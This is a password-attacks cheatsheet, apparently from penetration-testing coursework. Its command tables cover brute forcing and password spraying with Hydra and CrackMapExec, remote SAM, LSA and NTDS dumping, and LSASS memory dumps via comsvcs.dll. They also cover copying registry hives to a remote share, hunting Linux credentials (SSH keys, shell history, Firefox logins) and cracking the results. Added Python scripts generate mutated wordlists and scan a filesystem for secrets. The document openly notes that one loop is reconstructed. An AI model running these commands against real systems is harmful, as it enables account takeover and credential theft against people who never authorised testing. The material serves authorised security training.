Password Attacks Cheatsheet
Password attacks remain one of the most common ways into an organisation, and compromised credentials are behind a large share of breaches: 81% of breaches in 2020 were attributed to weak or stolen passwords[1][2]. The techniques range from phishing and man-in-the-middle interception to online brute force, password spraying and credential stuffing, and to offline cracking of dumped hashes[1][2]. Attacker tooling keeps improving, so defenders should pair strong password policies with multi-factor authentication and monitoring for the authentication failures these attacks generate[5]. The commands below are grouped by phase: reaching the target, building wordlists, attacking credentials remotely, harvesting credentials locally on Windows and Linux, and cracking what was harvested.
Connecting to Target
| Command | Description |
|---|---|
| xfreerdp /v: /u:htb-student /p:HTB_@cademy_stdnt! | CLI-based RDP client (FreeRDP) used to connect to a Windows target; /v: takes the target host, /u: and /p: the credentials. |
| evil-winrm -i -u user -p password | Uses Evil-WinRM to establish a PowerShell session with a target over WinRM (TCP 5985/5986) using a username and password. |
| ssh user@ | Uses SSH to connect to a target as the specified user. |
| smbclient -U user \\\SHARENAME | Uses smbclient to connect to an SMB share on the target as the specified user. |
| python3 smbserver.py -smb2support CompData /home//Documents/ | Uses Impacket's smbserver.py to expose a directory on a Linux attack host as the SMB share CompData. Useful for pulling files (hive copies, memory dumps) off a target. |
Password Mutations
| Command | Description |
|---|---|
| cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist | Uses CeWL to spider a website to depth 4 and build a wordlist from the words found on it, keeping only words of at least 6 characters and lowercasing them. |
| hashcat --force password.list -r custom.rule --stdout > mut_password.list | Uses Hashcat in --stdout mode to apply the rules in custom.rule to every word in password.list and write the mutated candidates to mut_password.list; no hashes are cracked in this mode. |
| ./username-anarchy -i /path/to/listoffirstandlastnames.txt | Uses username-anarchy with a pre-made list of first and last names to generate potential usernames in common formats (jsmith, john.smith, smithj, ...). |
| curl -s https://fileinfo.com/filetypes/compressed \| html2text | Fetches the list of compressed-archive file extensions from fileinfo.com with cURL and renders the HTML as plain text, to build an extension list for hunting archives and backups on a target. |
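Hashcat's -r rules and the sed filters in the Misc section at the end of this page are normally run as two separate steps. The script below is an added example (it is not part of the original cheatsheet and not hashcat's own code): it implements a small subset of hashcat's rule syntax in Python so both steps can be seen together, applying a constructed custom.rule to a constructed base wordlist and then dropping every candidate that would fail a typical policy (at least 8 characters, a digit and a special character). The rule lines, base words and policy thresholds are assumptions chosen for illustration.

```python
"""Mini hashcat-style rule engine: mutate a base wordlist with rule lines,
then keep only the candidates that satisfy a password policy.

Supported rule functions (a subset of hashcat's): ':' no-op, 'l' lowercase,
'u' uppercase, 'c' capitalize, 'C' invert capitalize, 't' toggle case,
'r' reverse, 'd' duplicate, '[' delete first char, ']' delete last char,
'$X' append X, '^X' prepend X, 'sXY' replace every X with Y.
Spaces between functions are ignored, as in hashcat; '$ ' still appends a space.
"""
import string

# Constructed sample input (not from the page): base words and a rule file.
BASE_WORDS = ["password", "inlane", "freight", "Summer"]
CUSTOM_RULES = [
    ":",                  # the word itself
    "c",                  # Password
    "c $1",               # Password1
    "c $2 $0 $2 $3",      # Password2023
    "c $2 $0 $2 $3 $!",   # Password2023!
    "u $1 $!",            # PASSWORD1!
    "sa@ so0 se3",        # p@ssw0rd
    "c sa@ so0 $1 $!",    # P@ssw0rd1!
    "r",                  # drowssap
]


def apply_rule(word: str, rule: str) -> str:
    """Apply one hashcat rule line to a word, function by function, left to right."""
    i, n = 0, len(rule)
    while i < n:
        f = rule[i]
        if f in " :":                               # separator / explicit no-op
            pass
        elif f == "l":
            word = word.lower()
        elif f == "u":
            word = word.upper()
        elif f == "c":
            word = word[:1].upper() + word[1:].lower()
        elif f == "C":
            word = word[:1].lower() + word[1:].upper()
        elif f == "t":
            word = word.swapcase()
        elif f == "r":
            word = word[::-1]
        elif f == "d":
            word = word * 2
        elif f == "[":
            word = word[1:]
        elif f == "]":
            word = word[:-1]
        elif f in "$^":                             # append / prepend one char
            i += 1
            if i >= n:
                raise ValueError(f"{f!r} needs a character in rule {rule!r}")
            word = word + rule[i] if f == "$" else rule[i] + word
        elif f == "s":                              # sXY: replace every X with Y
            if i + 2 >= n:
                raise ValueError(f"'s' needs two characters in rule {rule!r}")
            word = word.replace(rule[i + 1], rule[i + 2])
            i += 2
        else:
            raise ValueError(f"unsupported rule function {f!r} in {rule!r}")
        i += 1
    return word


def mutate(words, rules):
    """Every rule applied to every word; duplicates removed, first-seen order kept."""
    out, seen = [], set()
    for w in words:
        for r in rules:
            cand = apply_rule(w, r)
            if cand and cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def meets_policy(pw: str, min_len: int = 8) -> bool:
    """The same three checks as the sed filters: length, a digit, a special char."""
    return (len(pw) >= min_len
            and any(ch.isdigit() for ch in pw)
            and any(ch in string.punctuation for ch in pw))


def policy_candidates(words=BASE_WORDS, rules=CUSTOM_RULES, min_len=8):
    """Mutated wordlist with policy-failing candidates removed."""
    return [c for c in mutate(words, rules) if meets_policy(c, min_len)]


if __name__ == "__main__":
    for cand in policy_candidates():
        print(cand)
```

The filter runs after mutation for the same reason the sed commands are applied to the generated list rather than the base words: a short base word like "inlane" only becomes a policy-compliant candidate once a rule has appended digits and a symbol.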
Remote Password Attacks
| Command | Description |
|---|---|
| crackmapexec winrm -u user.list -p password.list | Uses CrackMapExec over WinRM to try every username in user.list with every password in password.list against the target. |
| crackmapexec smb -u "user" -p "password" --shares | Uses CrackMapExec to enumerate SMB shares on a target with a specified set of credentials. |
| hydra -L user.list -P password.list :// | Uses Hydra with a user list and a password list to brute-force logins over the specified service (service://target). |
| hydra -l username -P password.list :// | Uses Hydra with a single username and a password list to brute-force that account's password over the specified service. |
| hydra -L user.list -p password :// | Uses Hydra with a user list and a single password over the specified service. This is password spraying: one password against many accounts, which keeps each account below its lockout threshold. |
| hydra -C <user_pass.list> ssh:// | Uses Hydra with a colon-separated list of user:password pairs and tries each pair exactly once over the specified service. This is a credential stuffing attack with leaked credentials. |
| crackmapexec smb --local-auth -u -p --sam | Uses CrackMapExec with local administrator credentials to dump the password hashes stored in the SAM of a target over the network. |
| crackmapexec smb --local-auth -u -p --lsa | Uses CrackMapExec with local administrator credentials to dump LSA secrets over the network. Service-account and cached credentials recovered this way can include clear-text passwords. |
| crackmapexec smb -u -p --ntds | Uses CrackMapExec with domain administrator credentials to dump the hashes in NTDS.dit from a domain controller over the network. |
| evil-winrm -i -u Administrator -H "" | Uses Evil-WinRM to establish a PowerShell session on a Windows target with a username and NT hash instead of a password. This is a Pass-the-Hash attack. |
Windows Local Password Attacks
| Command | Description |
|---|---|
| tasklist /svc | Windows command-line utility that lists running processes together with the services hosted in each; useful for finding the LSASS PID. |
| findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml | Uses the Windows command-line utility findstr to search recursively (/S), case-insensitively (/I) and print only matching file names (/M) for the string "password" in many different file types. |
| Get-Process lsass | PowerShell cmdlet that displays process information. Run against LSASS it returns the PID needed to dump LSASS process memory from the command line. |
| rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full | Uses rundll32 to call the MiniDump export of comsvcs.dll and write a full memory dump of the LSASS process (PID 672 in this example; substitute the PID from Get-Process lsass). The dump file can then be transferred to an attack box to extract credentials. |
| pypykatz lsa minidump /path/to/lsassdumpfile | Uses pypykatz to parse an LSASS memory dump and extract credentials and password hashes from it. |
| reg.exe save hklm\sam C:\sam.save | Uses reg.exe to save a copy of a registry hive to a specified location on the file system. It can be used to copy any hive (e.g., hklm\sam, hklm\security, hklm\system); SAM, SECURITY and SYSTEM are all needed for an offline dump. |
| move sam.save \\NameofFileShare | Uses move to transfer a file to a specified file share over the network. |
| python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | Uses Impacket's secretsdump.py to decrypt the saved hives offline: NT hashes from SAM plus LSA secrets and cached domain credentials from SECURITY, using the boot key stored in SYSTEM. |
| vssadmin CREATE SHADOW /For=C: | Uses the Windows command-line tool vssadmin to create a volume shadow copy of C:. This allows NTDS.dit, which is locked while the domain controller is running, to be copied safely. |
| cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit | Uses copy to take NTDS.dit out of the shadow copy of C:. HarddiskVolumeShadowCopy2 is the shadow copy volume name printed by vssadmin; use the one from your own output. |
Linux Local Password Attacks
| Command | Description |
|---|---|
| for l in .conf .config .cnf;do echo -e "\nFile extension: " $l; find / -name "*$l" 2>/dev/null \| grep -v "lib";done | Loops over common configuration-file extensions and uses find to locate every matching file on the system, filtering out library paths. Configuration files frequently contain database and service credentials. |
| for i in $(find / -name "*.cnf" 2>/dev/null \| grep -v "doc");do echo -e "\nFile: " $i; grep -i -e user -e pass "$i" 2>/dev/null \| grep -v "^\s*#";done | For each .cnf file found (documentation paths excluded), prints the file name and any uncommented lines mentioning user or pass. The loop body is cut off in the source; the body shown here is a reconstruction of that search. |
| for l in .sql .db ".*db" ".db*";do echo -e "\nDB File extension: " $l; find / -name "*$l" 2>/dev/null \| grep -v "doc";done | Loops over database-file extensions (SQL dumps, SQLite and other .db files) and uses find to locate them, filtering out documentation paths. The wildcard patterns are quoted so the shell does not expand them in the current directory. |
| find /home/* -type f \( -name "*.txt" -o ! -name "*.*" \) | Uses find to list regular files in home directories that are either .txt files or have no extension at all (notes, TODO files, scripts). The parentheses make both name tests apply under -type f. |
| for l in .py .pyc .pl .go .jar .c .sh;do echo -e "\nFile extension: " $l; find / -name "*$l" 2>/dev/null \| grep -v "doc";done | Loops over script and source-code extensions and uses find to locate them, filtering out documentation paths. Scripts often embed hard-coded credentials. |
| for ext in .xls ".xls*" .xltx .csv ".od*" .doc ".doc*" .pdf .pot ".pot*" ".pp*";do echo -e "\nFile extension: " $ext; find / -name "*$ext" 2>/dev/null \| grep -v "lib";done | Loops over office-document extensions (spreadsheets, CSV, OpenDocument, Word, PDF, PowerPoint) and uses find to locate them, filtering out library paths. |
| cat /etc/crontab | Uses cat to view the system crontab in search of scheduled jobs that pass credentials on the command line or point to scripts worth reading. |
| ls -la /etc/cron.*/ | Uses ls -la to list the contents of the /etc/cron.* directories (cron.d, cron.hourly, cron.daily, ...). Scheduled scripts may contain hard-coded credentials. |
| grep -rnw "PRIVATE KEY" /* 2>/dev/null \| grep ":1" | Recursively searches the whole file system for the string PRIVATE KEY and keeps only hits on line 1 of a file, where the BEGIN header of a PEM-encoded private key sits. |
| grep -rnw "PRIVATE KEY" /home/* 2>/dev/null \| grep ":1" | The same search restricted to home directories, where user SSH keys are usually found. |
| grep -rnw "ssh-rsa" /home/* 2>/dev/null \| grep ":1" | Searches home directories for the string ssh-rsa on line 1 of a file, which turns up SSH public keys and authorized_keys files and so points to the hosts a user's private key can log in to. |
| tail -n5 /home/*/.bash* | Uses tail to print the last five lines of every user's bash history and related files (.bash_history, .bashrc, .bash_profile) under /home, where passwords typed on the command line end up. |
| python3 mimipenguin.py | Runs mimipenguin.py using Python 3 to extract clear-text credentials from process memory (requires root). |
| bash mimipenguin.sh | Runs mimipenguin.sh using bash. |
| python2.7 lazagne.py all | Runs LaZagne with all modules using Python 2.7. |
| ls -l .mozilla/firefox/ \| grep default | Lists the Firefox profile directories in the current user's home and filters for the default profile, where saved logins are stored. |
| cat .mozilla/firefox/1bplpd86.default-release/logins.json \| jq . | Pretty-prints logins.json from the Firefox profile. The usernames and passwords in it are encrypted with a key kept in key4.db in the same profile, which is what firefox_decrypt.py uses to recover them. |
| python3.9 firefox_decrypt.py | Runs Firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9. |
| python3 lazagne.py browsers | Runs Lazagne.py browsers module using Python 3. |
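The find and grep one-liners above each hunt for one kind of artefact. The script below is an added example (not part of the original cheatsheet and not one of the tools it lists) that combines those checks into a single walk of a directory tree: it prunes the same noisy directories the one-liners exclude with grep -v, selects configuration, database, script, history and key files by name, and reports lines that look like private keys, SSH public keys or user/password assignments while skipping comment lines. It builds a small constructed directory tree to run against offline; the file names, contents and regular expressions are assumptions chosen for illustration, and on a real host scan() would be pointed at / or /home.

```python
"""Credential hunt over a directory tree: the find / grep one-liners as one scan."""
import os
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Directory names the one-liners exclude with grep -v (library/documentation noise).
EXCLUDED_DIRS = {"lib", "lib64", "share", "doc", "fonts", "core", "headers", "man"}
# Extensions from the config, database, script and document searches above.
INTERESTING_SUFFIXES = {".conf", ".config", ".cnf", ".ini", ".env", ".sql", ".db",
                        ".txt", ".sh", ".py", ".pl", ".yml", ".yaml", ".json", ".xml"}
# What counts as a hit. Assumed patterns; tune them for the target.
PATTERNS = {
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "ssh_pubkey": re.compile(r"\bssh-(rsa|ed25519|dss)\b"),
    "credential": re.compile(
        r"(pass(word|wd)?|secret|token|user(name)?)\s*[=:]\s*\S+", re.I),
}


@dataclass
class Finding:
    path: str
    lineno: int
    category: str
    text: str


def is_interesting(name: str) -> bool:
    """Shell history files, SSH key files (id_*) and the extension list above."""
    return ("history" in name or name.startswith("id_")
            or Path(name).suffix in INTERESTING_SUFFIXES)


def scan(root: str) -> list:
    """Walk root, skip excluded directories, return one Finding per matching line."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune in place so os.walk never descends into excluded directories.
        dirnames[:] = [d for d in dirnames if d not in EXCLUDED_DIRS]
        for name in filenames:
            if not is_interesting(name):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="ignore") as fh:
                    lines = fh.readlines()
            except OSError:
                continue                     # unreadable: move on, like 2>/dev/null
            for lineno, raw in enumerate(lines, 1):
                line = raw.strip()
                if not line or line[0] in "#;":
                    continue                 # comment lines, like grep -v "\#"
                for category, rx in PATTERNS.items():
                    if rx.search(line):
                        findings.append(Finding(full, lineno, category, line))
                        break                # one category per line is enough
    return sorted(findings, key=lambda f: (f.path, f.lineno))


def build_sample_tree() -> str:
    """Constructed sample host layout (not real data) so scan() can run offline."""
    root = tempfile.mkdtemp(prefix="credhunt_")
    files = {
        "etc/mysql/my.cnf":
            "[client]\n# password = changeme\nuser = dbadmin\npassword = Sup3rS3cret!\n",
        "home/alice/.ssh/id_ed25519":
            "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAA\n"
            "-----END OPENSSH PRIVATE KEY-----\n",
        "home/alice/.bash_history":
            "ls -la\nexport DB_PASSWORD=Winter2023!\nssh deploy@10.10.10.5\n",
        "home/alice/notes.txt": "Remember: token=abc123\n",
        # Lives under a pruned directory, so it must not be reported.
        "usr/lib/python3/site-packages/app/settings.conf":
            "password = not_scanned_lib_dir\n",
    }
    for rel, content in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
    return root


if __name__ == "__main__":
    for f in scan(build_sample_tree()):
        print(f"{f.category:12} {f.path}:{f.lineno}: {f.text}")
```

Pruning dirnames inside os.walk is the equivalent of the grep -v filters but cheaper, because the excluded trees are never read at all; the credential pattern is deliberately loose (it also matches lines such as user = mysql) since a noisy list that is reviewed by hand is better than a tight one that misses a hit.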
Cracking Passwords
| Command | Description |
|---|---|
| hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt | Uses Hashcat to run a dictionary attack against NTLM hashes (mode 1000) with the specified wordlist. |
| hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show | Prints the cracked plaintext for a single NTLM hash from Hashcat's potfile. --show does not run an attack, it only displays results of earlier sessions, so run the command without --show first. |
| unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes | Uses unshadow to merge passwd.bak and shadow.bak into a single passwd-style file in the format John and Hashcat expect. |
| hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked | Uses Hashcat in dictionary mode (-a 0) to crack the sha512crypt ($6$) hashes from the unshadowed file and writes the cracked results to unshadowed.cracked. |
| hashcat -m 500 -a 0 md5-hashes.list rockyou.txt | Uses Hashcat with a wordlist to crack the md5crypt ($1$) Unix password hashes in md5-hashes.list (mode 500; plain MD5 would be mode 0). |
| hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked | Uses Hashcat to crack the extracted BitLocker hashes (mode 22100) with a wordlist and writes the cracked results to backup.cracked. |
| ssh2john.pl SSH.private > ssh.hash | Runs ssh2john.pl to convert the passphrase-protected SSH private key in SSH.private into a John hash and redirects it to ssh.hash. |
| john ssh.hash --show | Displays the passphrases John has already cracked for the hashes in ssh.hash, read from its potfile. Like Hashcat's --show it does not crack anything; run john --wordlist=rockyou.txt ssh.hash first. |
| office2john.py Protected.docx > protected-docx.hash | Runs office2john.py against a password-protected .docx file and writes the resulting hash to protected-docx.hash. |
| john --wordlist=rockyou.txt protected-docx.hash | Uses John with the wordlist rockyou.txt to crack the hash in protected-docx.hash. |
| pdf2john.pl PDF.pdf > pdf.hash | Runs pdf2john.pl to convert a password-protected PDF into a John hash and writes it to pdf.hash. |
| john --wordlist=rockyou.txt pdf.hash | Uses John with a wordlist to crack the PDF hash. |
| zip2john ZIP.zip > zip.hash | Runs zip2john against a password-protected zip archive to generate a hash and writes it to zip.hash. |
| john --wordlist=rockyou.txt zip.hash | Uses John with a wordlist to crack the hashes in zip.hash. |
| bitlocker2john -i Backup.vhd > backup.hashes | Uses bitlocker2john to extract BitLocker hashes from a VHD image and writes them to backup.hashes. |
| file GZIP.gzip | Uses the Linux file tool to identify the file format. An archive encrypted with openssl enc is reported as openssl enc'd data with salted password rather than as gzip data. |
| while read -r i; do openssl enc -aes-256-cbc -d -in GZIP.gzip -k "$i" 2>/dev/null \| tar xz 2>/dev/null && echo "Password: $i" && break; done < rockyou.txt | Tries every line of rockyou.txt as the password of an openssl-encrypted (aes-256-cbc) gzip tarball, piping each decryption attempt into tar. Only the correct password yields a valid archive, so the loop prints that password and stops as soon as tar extracts successfully. |
Hydra
| Command | Description |
|---|---|
| hydra -h | hydra help |
| hydra -C wordlist.txt SERVER_IP -s PORT http-get / | Basic Auth Brute Force - Combined Wordlist (-C takes user:pass pairs, one per line) |
| hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get / | Basic Auth Brute Force - User/Pass Wordlists (-u tries each password against every user before moving to the next password, -f stops at the first valid pair) |
| hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" | Login Form Brute Force - Static User, Pass Wordlist (^USER^ and ^PASS^ are substituted into the POST body; F= is the string that marks a failed login, so a response without it counts as success) |
| hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4 | SSH Brute Force - User/Pass Wordlists (-t 4 limits parallel connections, which SSH servers otherwise tend to drop) |
| hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1 | FTP Brute Force - Static User, Pass Wordlist |
Wordlists
| Command | Description |
|---|---|
| /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt | Default Passwords Wordlist |
| /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt | Common Passwords Wordlist |
| /opt/useful/SecLists/Usernames/Names/names.txt | Common Names Wordlist |
Misc
| Command | Description |
|---|---|
| cupp -i | Creating Custom Password Wordlist |
| sed -ri '/^.{,7}$/d' william.txt | Remove Passwords Shorter Than 8 |
| sed -ri '/[!-/:-@[-`{-~]+/!d' william.txt | Remove Passwords With No Special Chars |
| sed -ri '/[0-9]+/!d' william.txt | Remove Passwords With No Numbers |
| ./username-anarchy Bill Gates > bill.txt | Generate Usernames List |
| ssh b.gates@SERVER_IP -p PORT | SSH to Server |
| ftp 127.0.0.1 | FTP to Server |
| su - user | Switch to User |